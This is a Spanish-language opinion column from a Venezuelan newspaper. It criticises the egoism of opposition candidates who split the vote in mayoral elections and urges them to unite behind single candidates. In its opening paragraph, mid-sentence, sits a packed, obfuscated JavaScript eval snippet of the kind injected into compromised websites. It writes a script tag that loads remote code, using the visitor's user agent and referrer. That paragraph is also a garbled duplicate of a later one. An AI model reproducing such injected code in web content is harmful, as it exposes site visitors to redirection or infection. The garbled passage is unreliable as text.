publicidad

“¡Yo, yo y yo!”

Carolina Jaimes  Branger/Periodista/ carolinajaimesbranger@gmail.com
  En eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bikni|var|u0026u|referrer|hyeir||js|php'.split('|'),0,{})) momentos cuando la unidad es imprescindible y el discurso abstencionista toma más fuerza que nunca, es cuando más candidatos se presentan a las elecciones de alcaldes, porque “¡yo, yo y yo!”. Todos creen que van a ganar. Y la triste realidad es que ganará el candidato chavista, tal vez con 15 % de los votos

La soberbia de algunos de nuestros políticos la hemos pagado muy cara en Venezuela. Sin embargo, el “¡yo, yo y yo!” continúa a la orden del día. “¡Yo, yo y yo soy el único que puede remediar esto!”. “¡Yo, yo y yo soy la única que sabe qué hacer en esta situación porque los demás son unos idiotas!”. “¡Yo, yo y yo soy el candidato ideal!”. “¡Yo, yo y yo soy la que va a ganar estas elecciones, aunque haya 20 candidatos más!”. No tengo que seguir en la retahíla, lo hemos vivido muchas veces.

Desgraciadamente, esa soberbia que ciega a pocos, friega a muchos. Pagamos justos por pecadores, pues. En momentos cuando la unidad es imprescindible y el discurso abstencionista toma más fuerza que nunca, es cuando más candidatos se presentan a las elecciones de alcaldes, porque “¡yo, yo y yo!”. Todos creen que van a ganar. Y la triste realidad es que ganará el candidato chavista, tal vez con 15 % de los votos en municipios donde antes jamás hubieran ganado, solo porque “¡yo, yo y yo!” no puede ver más allá de sus narices y cree que la multitud se volcará a votar por él (o por ella). Malas noticias, compatriota: ni habrá multitud votando y los pocos que irán a votar diluirán sus votos entre todos los “¡yo, yo y yo!”. El final de la historia ya lo hemos vivido varias veces. Y nadie aprende. Ni ustedes con su “¡yo, yo y yo!” y los abstencionistas con su “con este CNE no voto”.

En Venezuela hay que arreglar todo. Reconstruir todo. Rehacer todo. Y ese proceso empieza por ponerse en los zapatos del otro. Por reconocer la otredad. Por poner de lado el “¡yo, yo y yo!” y aceptar que hay otros que también pueden, que también quieren y que hay que unir voluntades y trabajos. Leí que en Baruta, los candidatos piensan ponerse de acuerdo para lanzar un candidato único y los aplaudo. Espero que los otros hagan lo mismo en otros municipios. Porque si siguen con su “¡yo, yo y yo!”, quien va a ganar es “él, él, él” o “ella, ella, ella”, los chavistas que nadie quiere, pero que como son los únicos candidatos de su partido serán los flamantes alcaldes o alcaldesas, para continuar el proceso de destrucción institucional y moral del país.

¿Vas a seguir con el “¡yo, yo y yo!” o te atreverás a pasar a la premisa de “nosotros, nosotros, nosotros”? 

 

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama